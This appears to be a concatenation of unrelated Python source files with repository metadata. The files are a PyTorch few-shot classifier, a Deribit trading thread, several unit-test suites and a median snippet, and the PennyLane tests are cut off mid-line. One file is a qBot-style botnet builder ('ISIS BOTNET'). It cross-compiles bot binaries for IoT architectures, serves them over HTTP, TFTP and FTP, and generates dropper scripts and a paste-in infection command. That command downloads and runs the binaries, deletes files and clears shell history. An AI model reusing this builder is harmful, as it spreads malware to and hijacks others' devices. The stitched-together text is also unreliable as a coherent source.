import torch import torch.nn as nn import torch.nn.functional as F from classifier.base import BASE class ROUTING(BASE): ''' Induction and Relation module of "Induction Networks for Few-Shot Text Classification" ''' def __init__(self, ebd_dim, args): super(ROUTING, self).__init__(args) self.args = args self.ebd_dim = ebd_dim h = args.induct_hidden_dim self.iter = args.induct_iter if self.args.embedding == 'meta': print('No relation module. Use Prototypical network style prediction') else: # follow the original paper self.Ws = nn.Linear(self.ebd_dim, self.ebd_dim) self.M = nn.Parameter(torch.Tensor(h, 1, 1, self.ebd_dim, self.ebd_dim).uniform_(-0.1,0.1)) self.rel = nn.Linear(h, 1) def _squash(self, X): ''' Perform squashing over the last dimension The dimension remain the same ''' X_norm = torch.norm(X, dim=-1, keepdim=True) out = (X_norm ** 2) / (1.0 + X_norm ** 2) / X_norm * X return out def _compute_prototype(self, XS, YS): ''' Compute the prototype for each class by dynamic routing @param XS (support x): support_size x ebd_dim @param YS (support y): support_size @return prototype: way x ebd_dim ''' # sort YS to make sure classes of the same labels are clustered together YS, indices = torch.sort(YS) XS = XS[indices] # squash if self.args.embedding == 'meta': # do not transform the matrix to preserve information when # distributional signatures are used XS_hat = self._squash(XS) else: # original paper's transformation XS_hat = self._squash(self.Ws(XS)) b = torch.zeros([self.args.way, self.args.shot], device=XS.device) prototype = [] for it in range(self.iter): # perform dynamic routing for each class d = F.softmax(b, dim=-1) new_b = torch.zeros_like(b) for i in range(self.args.way): # examples belonging to class i XS_hat_cur = XS_hat[i*self.args.shot:(i+1)*self.args.shot,:] # generate prototypes c_hat = torch.sum(d[i, :].unsqueeze(1) * XS_hat_cur, dim=0) c = self._squash(c_hat) # update b new_b[i,:] = b[i,:] + (XS_hat_cur @ c.unsqueeze(1)).squeeze(1) if it == self.iter-1: prototype.append(c.unsqueeze(0)) b = new_b prototype = torch.cat(prototype, dim=0) return prototype def _compute_relation_score(self, prototype, XQ): ''' Compute the relation score between each prototype and each query example @param prototype: way x ebd_dim @param XQ: query_size x ebd_dim @return score: query_size x way ''' prototype = prototype.unsqueeze(0).unsqueeze(0).unsqueeze(-2) # 1, 1, way, 1, ebd_dim XQ = XQ.unsqueeze(1).unsqueeze(-1).unsqueeze(0) # 1, query_size, 1, ebd_dim, 1 score = torch.matmul(torch.matmul(prototype, self.M), XQ) # h, query_size, way, 1, 1 score = score.squeeze(-1).squeeze(-1).permute(1, 2, 0) # query_size, way, h score = F.relu(score) score = torch.sigmoid(self.rel(score)).squeeze(-1) return score def forward(self, XS, YS, XQ, YQ): ''' @param XS (support x): support_size x ebd_dim @param YS (support y): support_size @param XQ (support x): query_size x ebd_dim @param YQ (support y): query_size @return acc @return loss ''' YS, YQ = self.reidx_y(YS, YQ) prototype = self._compute_prototype(XS, YS) if self.args.embedding == 'meta': # use parameter free comparison when distributional signatures are # used score = -self._compute_l2(prototype, XQ) # score = -self._compute_cos(prototype, XQ) # l2 and cos deosn't have much diff empirically across the 6 # datasets loss = F.cross_entropy(score, YQ) else: # implementation based on the original paper score = self._compute_relation_score(prototype, XQ) # use regression as training objective YQ_onehot = self._label2onehot(YQ) loss = torch.sum((YQ_onehot.float() - score) ** 2) acc = BASE.compute_acc(score, YQ) return acc, loss
31.388158
103
0.559002
40964542fdb6760c522e5bebdab2ee6d89f2fa67
6,372
py
Python
compile.py
yassineas/Dream-qBot-Botnet-Source
d76d92776b1995655ef85eba216f5fdffc114b29
[ "MIT" ]
14
2020-12-22T01:38:02.000Z
2022-02-08T15:59:39.000Z
compile.py
yassineas/Dream-qBot-Botnet-Source
d76d92776b1995655ef85eba216f5fdffc114b29
[ "MIT" ]
2
2021-03-02T23:46:05.000Z
2022-03-16T10:20:48.000Z
compile.py
yassineas/Dream-qBot-Botnet-Source
d76d92776b1995655ef85eba216f5fdffc114b29
[ "MIT" ]
8
2020-10-08T02:16:19.000Z
2021-12-31T09:25:30.000Z
import subprocess, sys if len(sys.argv[2]) != 0: ip = sys.argv[2] else: print("\x1b[0;31mIncorrect Usage!") print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m") exit(1) bot = sys.argv[1] SNOOPY= raw_input("Y/n Get Arch-") if SNOOPY.lower() == "y": get_arch = True else: get_arch = False compileas = ["m-i.p-s.ISIS" , "m-p.s-l.ISIS" , "s-h.4-.ISIS", "x-8.6-.ISIS", "a-r.m-6.ISIS", "x-3.2-.ISIS", "a-r.m-7.ISIS", "p-p.c-.ISIS", "i-5.8-6.ISIS", "m-6.8-k.ISIS", "p-p.c-.ISIS", "a-r.m-4.ISIS" , "a-r.m-5.ISIS"] getarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2', 'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2', 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2', 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2', 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2'] ccs = ["cross-compiler-mips", "cross-compiler-mipsel", "cross-compiler-sh4", "cross-compiler-x86_64", "cross-compiler-armv6l", "cross-compiler-i686", "cross-compiler-powerpc", "cross-compiler-i586", "cross-compiler-m68k", "cross-compiler-armv7l", "cross-compiler-armv4l", "cross-compiler-armv4l", "cross-compiler-armv5l"] def run(cmd): subprocess.call(cmd, shell=True) run("rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*") if get_arch == True: run("rm -rf cross-compiler-*") print("Downloading Architectures") for arch in getarch: run("wget " + arch + " --no-check-certificate >> /dev/null") run("tar -xvf *tar.bz2") run("rm -rf *tar.bz2") print("Cross Compilers Downloaded...") num = 0 for cc in ccs: arch = cc.split("-")[2] run("./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + " -o " + compileas[num] + " " + bot + " > /dev/null") num += 1 print("Cross Compiling Done!") print("Setting up your httpd and tftp") run("yum install httpd -y") run("service httpd start") run("yum install xinetd tftp tftp-server -y") run("yum install vsftpd -y") run("service vsftpd start") run('''echo -e "# default: off # description: The tftp server serves files using the trivial file transfer \ # protocol. The tftp protocol is often used to boot diskless \ # workstations, download configuration files to network-aware printers, \ # and to start the installation process for some operating systems. service tftp { socket_type = dgram protocol = udp wait = yes user = root server = /usr/sbin/in.tftpd server_args = -s -c /var/lib/tftpboot disable = no per_source = 11 cps = 100 2 flags = IPv4 } " > /etc/xinetd.d/tftp''') run("service xinetd start") run('''echo -e "listen=YES local_enable=NO anonymous_enable=YES write_enable=NO anon_root=/var/ftp anon_max_rate=2048000 xferlog_enable=YES listen_address='''+ ip +''' listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''') run("service vsftpd restart") for i in compileas: run("cp " + i + " /var/www/html") run("cp " + i + " /var/ftp") run("mv " + i + " /var/lib/tftpboot") run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp1.sh') run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp1.sh') run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp1.sh') run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp2.sh') run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp2.sh') run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp2.sh') run('echo -e "#!/bin/bash" > /var/www/html/ISIS.sh') for i in compileas: run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '" >> /var/www/html/ISIS.sh') run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod 777 ' + i + ' ./' + i + '; rm -rf ' + i + '" >> /var/ftp/ftp1.sh') run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp1.sh') run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp2.sh') run("service xinetd restart") run("service httpd restart") run('echo -e "ulimit -n 99999" >> ~/.bashrc') #USE IF YOU WANT TO print("\x1b[0mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/SnOoPy.sh; chmod 777 SnOoPy.sh; sh SnOoPy.sh; tftp " + ip + " -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g " + ip + "; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf SnOoPy.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\x1b[0m") print("\x1b[1;33mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g " + ip + " -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c") print("\x1b[1;31m ISIS BOTNET CODED BY KOMODO FOR HIS SON SHY") print("\x1b[1;32m After you copied your link type 'ls' okay you got that? it is 'LS' but lowercase")
42.198675
444
0.566384
d91931efc1a8dc9e9617eb6fe7838e2b5b31012c
1,275
py
Python
deritradeterminal/threads/orders/LimitBuyThread.py
mrhelloyellow/deri-trade-terminal
a882ac4ae01924a06faf1b92ebe3bfe7110d2105
[ "MIT" ]
null
null
null
deritradeterminal/threads/orders/LimitBuyThread.py
mrhelloyellow/deri-trade-terminal
a882ac4ae01924a06faf1b92ebe3bfe7110d2105
[ "MIT" ]
null
null
null
deritradeterminal/threads/orders/LimitBuyThread.py
mrhelloyellow/deri-trade-terminal
a882ac4ae01924a06faf1b92ebe3bfe7110d2105
[ "MIT" ]
null
null
null
from PyQt5 import * from PyQt5.QtGui import * from PyQt5.QtCore import * from PyQt5.QtWidgets import * from deritradeterminal.util.deribit_api import RestClient from deritradeterminal.managers.ConfigManager import ConfigManager class LimitBuyThread(QThread): signeler = pyqtSignal(bool,str,str) def processOrder(self): try: config = ConfigManager.get_config() client = RestClient(config.tradeApis[self.accountid][0], config.tradeApis[self.accountid][1], ConfigManager.get_config().apiUrl) client.buy(ConfigManager.get_config().tradeInsturment, float(self.amount), float(self.price), "limit") self.signeler.emit(True, "Limit Order Success", "Limit Buy On Account: " + str(self.accountid) + " For Amount: " + str(self.amount) + " At Price: " + str(self.price)) except Exception as e: self.signeler.emit(False, "Limit Buy Order Error" , "Failed to limit buy on " + str(self.accountid) + " for amount: " + str(self.amount) + "\n" + str(e)) def __init__(self, accountid, price , amount): QThread.__init__(self) self.accountid = accountid self.price = price self.amount = amount def run(self): self.processOrder()
36.428571
178
0.661176
a79fb2ea1f73f4d7ba3ff4c225204eedff7c7463
718
py
Python
tests/test_helpers.py
michael-karotsieris/taggsy
94bd0522963f699c5b3b94d9c7d25d447d75d148
[ "MIT" ]
null
null
null
tests/test_helpers.py
michael-karotsieris/taggsy
94bd0522963f699c5b3b94d9c7d25d447d75d148
[ "MIT" ]
null
null
null
tests/test_helpers.py
michael-karotsieris/taggsy
94bd0522963f699c5b3b94d9c7d25d447d75d148
[ "MIT" ]
null
null
null
from unittest import TestCase from .context import taggsy class TestFilterStopwords(TestCase): def test_filters_out_stopwords(self): ''' Test that stopwords are filtered out ''' word_list = ['this', 'is', 'are'] filtered_list = taggsy.helpers.filter_stopwords(words=word_list) self.assertEqual(filtered_list, []) def test_does_not_filter_out_non_stopwords(self): ''' Test that non-stopwords are not filtered out ''' word_list = ['word', 'clarity'] filtered_list = taggsy.helpers.filter_stopwords(words=word_list) self.assertEqual(filtered_list, word_list) if __name__ == "__main__": unittest.main()
26.592593
72
0.657382
96a01725d974a4f5863d067df7dc10ea9a6673ad
229
py
Python
Task/Averages-Median/Python/averages-median.py
LaudateCorpus1/RosettaCodeData
9ad63ea473a958506c041077f1d810c0c7c8c18d
[ "Info-ZIP" ]
5
2021-01-29T20:08:05.000Z
2022-03-22T06:16:05.000Z
Task/Averages-Median/Python/averages-median.py
seanwallawalla-forks/RosettaCodeData
9ad63ea473a958506c041077f1d810c0c7c8c18d
[ "Info-ZIP" ]
null
null
null
Task/Averages-Median/Python/averages-median.py
seanwallawalla-forks/RosettaCodeData
9ad63ea473a958506c041077f1d810c0c7c8c18d
[ "Info-ZIP" ]
1
2018-11-09T22:08:40.000Z
2018-11-09T22:08:40.000Z
def median(aray): srtd = sorted(aray) alen = len(srtd) return 0.5*( srtd[(alen-1)//2] + srtd[alen//2]) a = (4.1, 5.6, 7.2, 1.7, 9.3, 4.4, 3.2) print a, median(a) a = (4.1, 7.2, 1.7, 9.3, 4.4, 3.2) print a, median(a)
22.9
51
0.519651
886599ad0d84c0ce611ddced49e4889dff31a7ea
3,530
py
Python
test/test_partner.py
SimplyAutomationized/python-snap7
966127a712754a543eeb4a5d71d52be7a80811f9
[ "MIT" ]
8
2016-01-08T21:11:05.000Z
2019-08-03T02:52:30.000Z
test/test_partner.py
SimplyAutomationized/python-snap7
966127a712754a543eeb4a5d71d52be7a80811f9
[ "MIT" ]
null
null
null
test/test_partner.py
SimplyAutomationized/python-snap7
966127a712754a543eeb4a5d71d52be7a80811f9
[ "MIT" ]
3
2016-01-31T18:43:33.000Z
2020-02-04T14:08:52.000Z
import logging import unittest as unittest import snap7.partner from snap7.snap7exceptions import Snap7Exception logging.basicConfig(level=logging.WARNING) class TestPartner(unittest.TestCase): def setUp(self): self.partner = snap7.partner.Partner() self.partner.start() def test_as_b_send(self): self.partner.as_b_send() @unittest.skip("we don't recv something yet") def test_b_recv(self): self.partner.b_recv() def test_b_send(self): self.partner.b_send() def test_check_as_b_recv_completion(self): self.partner.check_as_b_recv_completion() def test_check_as_b_send_completion(self): self.partner.check_as_b_send_completion() def test_create(self): self.partner.create() def test_destroy(self): self.partner.destroy() def test_error_text(self): snap7.common.error_text(0, context="partner") def test_get_last_error(self): self.partner.get_last_error() def test_get_param(self): expected = ( (snap7.snap7types.LocalPort, 0), (snap7.snap7types.RemotePort, 102), (snap7.snap7types.PingTimeout, 750), (snap7.snap7types.SendTimeout, 10), (snap7.snap7types.RecvTimeout, 3000), (snap7.snap7types.SrcRef, 256), (snap7.snap7types.DstRef, 0), (snap7.snap7types.SrcTSap, 0), (snap7.snap7types.PDURequest, 480), (snap7.snap7types.WorkInterval, 100), (snap7.snap7types.BSendTimeout, 3000), (snap7.snap7types.BRecvTimeout, 3000), (snap7.snap7types.RecoveryTime, 500), (snap7.snap7types.KeepAliveTime, 5000), ) for param, value in expected: self.assertEqual(self.partner.get_param(param), value) self.assertRaises(Exception, self.partner.get_param, snap7.snap7types.MaxClients) def test_get_stats(self): self.partner.get_stats() def test_get_status(self): self.partner.get_status() def test_get_times(self): self.partner.get_times() def test_set_param(self): values = ( (snap7.snap7types.PingTimeout, 800), (snap7.snap7types.SendTimeout, 15), (snap7.snap7types.RecvTimeout, 3500), (snap7.snap7types.WorkInterval, 50), (snap7.snap7types.SrcRef, 128), (snap7.snap7types.DstRef, 128), (snap7.snap7types.SrcTSap, 128), (snap7.snap7types.PDURequest, 470), (snap7.snap7types.BSendTimeout, 2000), (snap7.snap7types.BRecvTimeout, 2000), (snap7.snap7types.RecoveryTime, 400), (snap7.snap7types.KeepAliveTime, 4000), ) for param, value in values: self.partner.set_param(param, value) self.assertRaises(Exception, self.partner.set_param, snap7.snap7types.RemotePort, 1) def test_set_recv_callback(self): self.partner.set_recv_callback() def test_set_send_callback(self): self.partner.set_send_callback() def test_start(self): self.partner.start() def test_start_to(self): self.partner.start_to('0.0.0.0', '0.0.0.0', 0, 0) def test_stop(self): self.partner.stop() def test_wait_as_b_send_completion(self): self.assertRaises(Snap7Exception, self.partner.wait_as_b_send_completion) if __name__ == '__main__': unittest.main()
30.17094
81
0.633144
9a2077225534ddcaded39bba9108c9b10ed9519f
25,916
py
Python
tests/test_tf.py
InduManimaran/pennylane
375d25acc7bd2e6d5243b5273958b26513c33189
[ "Apache-2.0" ]
2
2021-06-29T01:30:08.000Z
2021-08-23T10:38:52.000Z
tests/test_tf.py
InduManimaran/pennylane
375d25acc7bd2e6d5243b5273958b26513c33189
[ "Apache-2.0" ]
null
null
null
tests/test_tf.py
InduManimaran/pennylane
375d25acc7bd2e6d5243b5273958b26513c33189
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 Xanadu Quantum Technologies Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Unit tests for the :mod:`pennylane.interface.tf` QNode interface. """ import pytest import numpy as np try: import tensorflow as tf if tf.__version__[0] == "1": import tensorflow.contrib.eager as tfe tf.enable_eager_execution() Variable = tfe.Variable else: from tensorflow import Variable except ImportError as e: pass import pennylane as qml from pennylane.qnode import _flatten, unflatten, QNode, QuantumFunctionError from pennylane.plugins.default_qubit import CNOT, Rotx, Roty, Rotz, I, Y, Z from pennylane._device import DeviceError def expZ(state): return np.abs(state[0]) ** 2 - np.abs(state[1]) ** 2 @pytest.mark.usefixtures("skip_if_no_tf_support") class TestTFQNodeExceptions(): """TFQNode basic tests.""" def test_qnode_fails_on_wrong_return_type(self, qubit_device_2_wires): """The qfunc must return only Expectations""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) return qml.expval(qml.PauliZ(0)), 0.3 with pytest.raises(QuantumFunctionError, match='must return either'): qf(Variable(0.5)) def test_qnode_fails_on_expval_not_returned(self, qubit_device_2_wires): """All expectation values in the qfunc must be returned""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) ex = qml.expval(qml.PauliZ(1)) return qml.expval(qml.PauliZ(0)) with pytest.raises(QuantumFunctionError, match='All measured observables'): qf(Variable(0.5)) def test_qnode_fails_on_wrong_expval_order(self, qubit_device_2_wires): """Expvals must be returned in the order they were created in""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) ex = qml.expval(qml.PauliZ(1)) return qml.expval(qml.PauliZ(0)), ex with pytest.raises(QuantumFunctionError, match='All measured observables'): qf(Variable(0.5)) def test_qnode_fails_on_gates_after_measurements(self, qubit_device_2_wires): """Gates have to precede measurements""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) ev = qml.expval(qml.PauliZ(1)) qml.RY(0.5, wires=[0]) return ev with pytest.raises(QuantumFunctionError, match='gates must precede'): qf(Variable(0.5)) def test_qnode_fails_on_multiple_measurements_of_same_wire(self, qubit_device_2_wires): """A wire can only be measured once""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) qml.CNOT(wires=[0, 1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliX(0)) with pytest.raises(QuantumFunctionError, match='can only be measured once'): qf(Variable(0.5)) def test_qnode_fails_on_qfunc_with_too_many_wires(self, qubit_device_2_wires): """The device must have sufficient wires for the qfunc""" @qml.qnode(qubit_device_2_wires, interface='tf') def qf(x): qml.RX(x, wires=[0]) qml.CNOT(wires=[0, 2]) return qml.expval(qml.PauliZ(0)) with pytest.raises(QuantumFunctionError, match='applied to invalid wire'): qf(Variable(0.5)) def test_qnode_fails_on_combination_of_cv_and_qbit_ops(self, qubit_device_1_wire): """CV and discrete operations must not be mixed""" @qml.qnode(qubit_device_1_wire, interface='tf') def qf(x): qml.RX(x, wires=[0]) qml.Displacement(0.5, 0, wires=[0]) return qml.expval(qml.PauliZ(0)) with pytest.raises(QuantumFunctionError, match='Continuous and discrete'): qf(Variable(0.5)) def test_qnode_fails_for_cv_ops_on_qubit_device(self, qubit_device_1_wire): """A qubit device cannot execute CV operations""" @qml.qnode(qubit_device_1_wire, interface='tf') def qf(x): qml.Displacement(0.5, 0, wires=[0]) return qml.expval(qml.X(0)) with pytest.raises(DeviceError, match='Gate [a-zA-Z]+ not supported on device'): qf(Variable(0.5)) def test_qnode_fails_for_cv_observables_on_qubit_device(self, qubit_device_1_wire): """A qubit device cannot measure CV observables""" @qml.qnode(qubit_device_1_wire, interface='tf') def qf(x): return qml.expval(qml.X(0)) with pytest.raises(DeviceError, match='Observable [a-zA-Z]+ not supported on device'): qf(Variable(0.5)) @pytest.mark.usefixtures("skip_if_no_tf_support") class TestTFQNodeParameterHandling: """Test that the TFQNode properly handles the parameters of qfuncs""" def test_qnode_fanout(self, qubit_device_1_wire, tol): """Tests that qnodes can compute the correct function when the same parameter is used in multiple gates.""" @qml.qnode(qubit_device_1_wire, interface='tf') def circuit(reused_param, other_param): qml.RX(reused_param, wires=[0]) qml.RZ(other_param, wires=[0]) qml.RX(reused_param, wires=[0]) return qml.expval(qml.PauliZ(0)) thetas = tf.linspace(-2*np.pi, 2*np.pi, 7) for reused_param in thetas: for theta in thetas: other_param = theta ** 2 / 11 y_eval = circuit(reused_param, other_param) Rx = Rotx(reused_param.numpy()) Rz = Rotz(other_param.numpy()) zero_state = np.array([1.,0.]) final_state = (Rx @ Rz @ Rx @ zero_state) y_true = expZ(final_state) assert np.allclose(y_eval, y_true, atol=tol, rtol=0) def test_qnode_array_parameters_scalar_return(self, qubit_device_1_wire, tol): """Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow. Test case for a circuit that returns a scalar.""" # The objective of this test is not to check if the results are correctly calculated, # but to check that the interoperability of the different return types works. @qml.qnode(qubit_device_1_wire, interface='tf') def circuit(dummy1, array, dummy2): qml.RY(0.5 * array[0,1], wires=0) qml.RY(-0.5 * array[1,1], wires=0) return qml.expval(qml.PauliX(0)) # returns a scalar grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4)) cost_target = 1.03257 args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13)) def cost(x, array, y): c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32) return c +0.5*array[0,0] +x -0.4*y with tf.GradientTape() as tape: cost_res = cost(*args) grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])]) assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0) assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0) def test_qnode_array_parameters_1_vector_return(self, qubit_device_1_wire, tol): """Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow Test case for a circuit that returns a 1-vector.""" # The objective of this test is not to check if the results are correctly calculated, # but to check that the interoperability of the different return types works. @qml.qnode(qubit_device_1_wire, interface='tf') def circuit(dummy1, array, dummy2): qml.RY(0.5 * array[0,1], wires=0) qml.RY(-0.5 * array[1,1], wires=0) return qml.expval(qml.PauliX(0)), # note the comma, returns a 1-vector grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4)) cost_target = 1.03257 args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13)) def cost(x, array, y): c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32) c = c[0] # get a scalar return c +0.5*array[0,0] +x -0.4*y with tf.GradientTape() as tape: cost_res = cost(*args) grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])]) assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0) assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0) def test_qnode_array_parameters_2_vector_return(self, qubit_device_2_wires, tol): """Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow Test case for a circuit that returns a 2-vector.""" # The objective of this test is not to check if the results are correctly calculated, # but to check that the interoperability of the different return types works. @qml.qnode(qubit_device_2_wires, interface='tf') def circuit(dummy1, array, dummy2): qml.RY(0.5 * array[0,1], wires=0) qml.RY(-0.5 * array[1,1], wires=0) qml.RY(array[1,0], wires=1) return qml.expval(qml.PauliX(0)), qml.expval(qml.PauliX(1)) # returns a 2-vector grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4)) cost_target = 1.03257 args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13)) def cost(x, array, y): c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32) c = c[0] # get a scalar return c +0.5*array[0,0] +x -0.4*y with tf.GradientTape() as tape: cost_res = cost(*args) grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])]) assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0) assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0) def test_array_parameters_evaluate(self, qubit_device_2_wires, tol): """Test that array parameters gives same result as positional arguments.""" a, b, c = tf.constant(0.5), tf.constant(0.54), tf.constant(0.3) def ansatz(x, y, z): qml.QubitStateVector(np.array([1, 0, 1, 1])/np.sqrt(3), wires=[0, 1]) qml.Rot(x, y, z, wires=0) qml.CNOT(wires=[0, 1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliY(1)) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit1(x, y, z): return ansatz(x, y, z) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit2(x, array): return ansatz(x, array[0], array[1]) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit3(array): return ansatz(*array) positional_res = circuit1(a, b, c) array_res1 = circuit2(a, Variable([b, c])) array_res2 = circuit3(Variable([a, b, c])) assert np.allclose(positional_res.numpy(), array_res1.numpy(), atol=tol, rtol=0) assert np.allclose(positional_res.numpy(), array_res2.numpy(), atol=tol, rtol=0) def test_multiple_expectation_different_wires(self, qubit_device_2_wires, tol): """Tests that qnodes return multiple expectation values.""" a, b, c = Variable(0.5), Variable(0.54), Variable(0.3) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit(x, y, z): qml.RX(x, wires=[0]) qml.RZ(y, wires=[0]) qml.CNOT(wires=[0, 1]) qml.RY(y, wires=[0]) qml.RX(z, wires=[0]) return qml.expval(qml.PauliY(0)), qml.expval(qml.PauliZ(1)) res = circuit(a, b, c) out_state = np.kron(Rotx(c.numpy()), I) @ np.kron(Roty(b.numpy()), I) @ CNOT \ @ np.kron(Rotz(b.numpy()), I) @ np.kron(Rotx(a.numpy()), I) @ np.array([1, 0, 0, 0]) ex0 = np.vdot(out_state, np.kron(Y, I) @ out_state) ex1 = np.vdot(out_state, np.kron(I, Z) @ out_state) ex = np.array([ex0, ex1]) assert np.allclose(ex, res.numpy(), atol=tol, rtol=0) def test_multiple_keywordargs_used(self, qubit_device_2_wires, tol): """Tests that qnodes use multiple keyword arguments.""" @qml.qnode(qubit_device_2_wires, interface='tf') def circuit(w, x=None, y=None): qml.RX(x, wires=[0]) qml.RX(y, wires=[1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)) c = circuit(tf.constant(1.), x=np.pi, y=np.pi) assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0) def test_multidimensional_keywordargs_used(self, qubit_device_2_wires, tol): """Tests that qnodes use multi-dimensional keyword arguments.""" def circuit(w, x=None): qml.RX(x[0], wires=[0]) qml.RX(x[1], wires=[1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)) circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf() c = circuit(tf.constant(1.), x=[np.pi, np.pi]) assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0) def test_keywordargs_for_wires(self, qubit_device_2_wires, tol): """Tests that wires can be passed as keyword arguments.""" default_q = 0 def circuit(x, q=default_q): qml.RY(x, wires=0) return qml.expval(qml.PauliZ(q)) circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf() c = circuit(tf.constant(np.pi), q=1) assert np.allclose(c, 1., atol=tol, rtol=0) c = circuit(tf.constant(np.pi)) assert np.allclose(c.numpy(), -1., atol=tol, rtol=0) def test_keywordargs_used(self, qubit_device_1_wire, tol): """Tests that qnodes use keyword arguments.""" def circuit(w, x=None): qml.RX(x, wires=[0]) return qml.expval(qml.PauliZ(0)) circuit = qml.QNode(circuit, qubit_device_1_wire).to_tf() c = circuit(tf.constant(1.), x=np.pi) assert np.allclose(c.numpy(), -1., atol=tol, rtol=0) def test_mixture_numpy_tensors(self, qubit_device_2_wires, tol): """Tests that qnodes work with python types and tensors.""" @qml.qnode(qubit_device_2_wires, interface='tf') def circuit(w, x, y): qml.RX(x, wires=[0]) qml.RX(y, wires=[1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)) c = 